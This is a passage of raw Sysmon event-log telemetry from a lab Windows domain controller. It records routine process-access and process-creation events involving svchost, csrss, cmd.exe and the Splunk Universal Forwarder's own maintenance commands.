13:53:25.867{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002397Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.867{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002396Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.867{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002395Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.867{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002394Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.867{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002393Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.867{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-8555-5FCF-6B00-000000009101}2568C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002392Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.867{10ACEC4A-8551-5FCF-3300-000000009101}30803836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-8555-5FCF-6B00-000000009101}2568C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002391Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.878{10ACEC4A-8555-5FCF-6B00-000000009101}2568C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\MonitorNoHandle.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002390Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.633{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8555-5FCF-6A00-000000009101}2832C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002389Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.633{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002388Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.633{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002387Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.633{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002386Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.633{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002385Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.633{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002384Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.633{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002383Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.633{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002382Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.617{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002381Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.617{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002380Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.617{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-8555-5FCF-6A00-000000009101}2832C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002379Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.617{10ACEC4A-8555-5FCF-6900-000000009101}25603848C:\Windows\system32\cmd.exe{10ACEC4A-8555-5FCF-6A00-000000009101}2832C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002378Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.632{10ACEC4A-8555-5FCF-6A00-000000009101}2832C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{10ACEC4A-8555-5FCF-6900-000000009101}2560C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1 10341000x80000000000000002377Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.617{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8555-5FCF-6900-000000009101}2560C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002376Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.617{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002375Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.617{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002374Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.617{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002373Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.617{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002372Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.617{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.d